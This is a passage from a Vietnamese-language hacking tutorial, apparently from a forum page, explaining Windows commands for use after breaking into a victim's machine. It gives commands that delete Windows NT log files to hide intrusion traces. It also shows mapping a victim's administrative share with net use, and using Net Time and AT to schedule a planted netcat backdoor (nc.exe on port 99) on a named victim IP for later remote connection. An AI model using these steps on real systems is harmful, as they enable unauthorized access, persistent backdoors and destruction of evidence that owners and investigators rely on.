11. Lệnh DIR : Cú pháp: Code: DIR [drive:][path][filename]
Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng
dẫn. Công dụng: + Để xem file, folder.
12. Lệnh DEL : Cú pháp: Code: DEL [drive:][path][filename]
Lệnh này cũng căn bản rùi, ko phải nói nhìu.
Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết
của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT: Code: del
C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del
C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log
13. L
ệnh tạo ổ đĩa ảo trên computer: Cú pháp: Code: Net use z: \\ip\C$ ( hoặc là IPC$ )
-
Z là của mình...còn C$ là của Victim
Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)
14. Lệnh Net Time : Cú pháp: Code: Net Time \\ip
Công dụng: + Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.
15. Lệnh AT: Cú pháp: Code: AT \\ip
Công dụng: + Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên
máy tính
victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng.
Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port
99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 . Code:
Net Time \\
68.135.23.25 Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00. Code: AT
\\
68.135.23.25 12:3 nc.exe Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể
connected
đến port 99.
16. Lệnh Telnet: Cú pháp: Code: telnet host port
Chia sẻ với bạn bè của bạn: |